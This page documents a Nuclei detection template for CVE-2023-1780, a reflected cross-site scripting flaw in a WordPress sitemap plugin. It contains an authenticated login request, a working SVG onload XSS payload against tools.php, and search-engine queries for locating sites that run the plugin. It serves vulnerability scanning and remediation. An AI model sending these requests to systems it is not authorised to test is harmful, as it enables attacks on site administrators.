Skip to content
Nuclei Templates

Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting

ID: CVE-2023-1780

Severity: medium

Author: r3Y3r53

Tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer

Description

Section titled “Description”

The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

YAML Source

Section titled “YAML Source”
id: CVE-2023-1780


info:
  name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  remediation: Fixed in version 4.5.3
  reference:
    - https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1780
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1780
    cwe-id: CWE-79
    epss-score: 0.00071
    epss-percentile: 0.30482
    cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: codeermeneer
    product: companion_sitemap_generator
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/companion-sitemap-generator/
    fofa-query: body=/wp-content/plugins/companion-sitemap-generator/
    publicwww-query: "/wp-content/plugins/companion-sitemap-generator/"
  tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "re not allowed to view")'
          - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
        condition: and
# digest: 4a0a00473045022039f29b9f063ed82efc54f65c977eab08d1d73e7ed50530127c89daa6de5e1658022100d768039bdc915b040fb937af367ebb69b47bab69fd066204dbd631067c69a2f6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-1780.yaml"

View on Github